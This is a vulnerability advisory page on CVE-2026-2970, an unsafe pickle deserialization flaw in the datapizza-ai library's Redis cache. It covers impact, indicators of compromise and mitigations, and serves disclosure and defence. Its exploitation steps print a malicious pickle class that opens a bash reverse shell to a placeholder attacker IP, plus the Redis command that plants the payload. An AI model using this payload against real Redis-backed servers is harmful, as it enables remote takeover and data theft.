CVE-2026-2970: 
Python vulnerability analysis and mitigation

Overview

CVE-2026-2970 is an unsafe deserialization vulnerability in the RedisCache function of the datapizza-ai Python library (version 0.0.2/0.0.7), located in datapizza-ai-cache/redis/datapizza/cache/redis/cache.py. The flaw allows an adjacent-network attacker to achieve remote code execution by poisoning the Redis cache with a malicious serialized payload. It was publicly disclosed on February 23, 2026, with a proof-of-concept published by Hacktive Security researcher Edoardo Ottavianelli. The vendor was contacted prior to disclosure but did not respond. It carries a CVSS v3.1 base score of 7.5 (High) (Feedly, PoC Disclosure).

Technical details

The root cause is the use of Python's pickle.loads() to deserialize data retrieved directly from Redis without any integrity or type validation (CWE-502: Deserialization of Untrusted Data; CWE-20: Improper Input Validation). The RedisCache.get() method calls pickle.loads(pickled_obj) on whatever bytes are stored in Redis, meaning any attacker who can write to the Redis instance can inject a crafted pickle payload that executes arbitrary OS commands upon deserialization. Exploitation requires adjacent network access to the Redis server (typically unauthenticated by default) and the ability to set a key with a malicious pickle payload — for example, using redis-cli SET <key> <pickle_bytes>. A public PoC demonstrates triggering os.system() via a custom __reduce__ method in a malicious class (PoC Disclosure).

Impact

Successful exploitation grants the attacker arbitrary command execution on the server hosting the datapizza-ai application, running as the process's service account with no privilege restrictions. Beyond direct RCE, attackers can subvert AI model behavior by injecting fake outputs into cached queries, exfiltrate sensitive data, deploy reverse shells for persistent access, or pivot laterally within the internal network. Confidentiality, integrity, and availability are all fully compromised upon successful exploitation (PoC Disclosure, Feedly).

Exploitability

A public proof-of-concept exploit is available on GitHub, published by Hacktive Security, and the vulnerability is also listed on VulDB. Exploitation has been demonstrated and reported by undercodetesting.com, which documented a critical RCE chain combining SSTI and unsafe deserialization in datapizza-ai pipelines. The EPSS score is approximately 0.031% (low probability of broad automated exploitation), and the vulnerability does not appear in the CISA KEV catalog as of the time of this report. No patch has been released by the vendor (PoC Disclosure, Feedly, RCE Chain Report).

Exploitation steps

  1. Reconnaissance: Identify systems on the local/adjacent network running datapizza-ai (version 0.0.2 or 0.0.7) with an accessible Redis instance, typically listening on port 6379 with no authentication.
  2. Gain Redis access: Connect to the Redis server using redis-cli or a Redis client library from the adjacent network (e.g., redis-cli -h <target-ip> -p 6379).
  3. Craft malicious pickle payload: Create a Python pickle payload using a class with a __reduce__ method that executes an OS command:
import pickle, os
class Evil:
    def __reduce__(self):
        return (os.system, ("bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1",))
payload = pickle.dumps(Evil())
  1. Poison the Redis cache: Write the malicious payload to a Redis key that the application will subsequently read:
127.0.0.1:6379> SET <cache_key> <pickle_bytes>
  1. Trigger deserialization: Wait for or trigger the application to call RedisCache.get(<cache_key>), which invokes pickle.loads() on the poisoned value, executing the embedded OS command on the server.
  2. Achieve RCE: The reverse shell or command output is returned to the attacker, providing full control of the server host (PoC Disclosure).

Indicators of compromise

  • Network: Unexpected inbound connections to Redis port 6379 from non-application hosts on the adjacent network; outbound connections from the application server to unknown external IPs (indicative of reverse shell activity).
  • File System: Unexpected files created in the application working directory (e.g., cachepwned as demonstrated in the PoC); new scripts, cron jobs, or SSH authorized keys added by the application service account.
  • Logs: Redis access logs showing SET commands for keys not written by the legitimate application; application logs showing errors or unexpected output from pickle.loads() calls.
  • Process: Unusual child processes spawned by the Python application process (e.g., bash, sh, curl, wget, nc); reverse shell connections originating from the datapizza-ai process (PoC Disclosure).

Mitigation and workarounds

No vendor patch is currently available, as the vendor did not respond to the responsible disclosure. As immediate mitigations: (1) restrict Redis access using firewall rules or network segmentation so only trusted application hosts can connect on port 6379; (2) enable Redis authentication (requirepass) to prevent unauthorized writes; (3) consider replacing pickle with a safe serialization format such as json or msgpack if modifying the library locally; (4) monitor Redis for unexpected key writes and audit all data stored in the cache. Organizations should evaluate whether continued use of datapizza-ai is acceptable given the unpatched state and available public exploit (Feedly, PoC Disclosure).

Community reactions

Hacktive Security published a detailed blog post on February 25, 2026, titled "datapizza-ai: Yet Another Vulnerable AI Framework," framing the disclosure within a broader concern about security practices in AI/ML libraries. The undercodetesting.com blog highlighted the vulnerability as part of a critical RCE chain combining SSTI and unsafe deserialization, emphasizing risks to AI pipelines. The disclosure was picked up by multiple vulnerability aggregators including VulDB, CIRCL, and INCIBE-CERT, reflecting moderate community interest. No official vendor statement has been issued (Hacktive Security Blog, RCE Chain Report).

Additional resources


Source: This report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-v2f8-6655-7grjCRITICAL10
  • Python logoPython
  • vibe-trading-ai
NoYesOct 02, 2026
CVE-2026-105782HIGH7.5
  • Python logoPython
  • scrapy
NoYesOct 06, 2026
GHSA-v853-p72q-4cfwHIGH7.5
  • Python logoPython
  • quart
NoYesOct 05, 2026
CVE-2026-105751MEDIUM6.9
  • Python logoPython
  • docling
NoYesOct 05, 2026
CVE-2026-105750MEDIUM5.9
  • Python logoPython
  • docling
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management